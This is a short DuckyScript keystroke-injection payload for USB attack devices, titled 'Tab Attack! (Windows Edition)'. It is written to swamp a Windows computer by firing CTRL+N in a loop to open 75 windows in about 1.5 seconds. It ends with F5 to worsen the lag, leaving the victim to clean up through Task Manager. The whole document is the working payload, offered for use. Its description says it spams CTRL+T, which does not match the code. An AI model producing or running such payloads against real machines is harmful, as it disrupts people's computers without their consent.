REM TITLE: Tab Attack! (Windows Edition)
REM AUTHOR: thatonemisterx
REM DESCRIPTION: 
REM This payload is designed to open a new tab on Google before spamming the "Open new tab" keybind (CTRL + T).
REM After running for a few seconds, the user has to use Task Manager to delete the tabs.

REM Step 1: Open the first window
DELAY 200
CTRL n
DELAY 250

REM Step 2: Loop it so it opens 75 new windows in 1.5 seconds
VAR $FOO = 75
WHILE ( $FOO > 0 )
 CTRL n
DELAY 20
$FOO = ( $FOO - 1 )
END_WHILE

REM Step 3: Open a view of all of the windows to complete the lag
F5
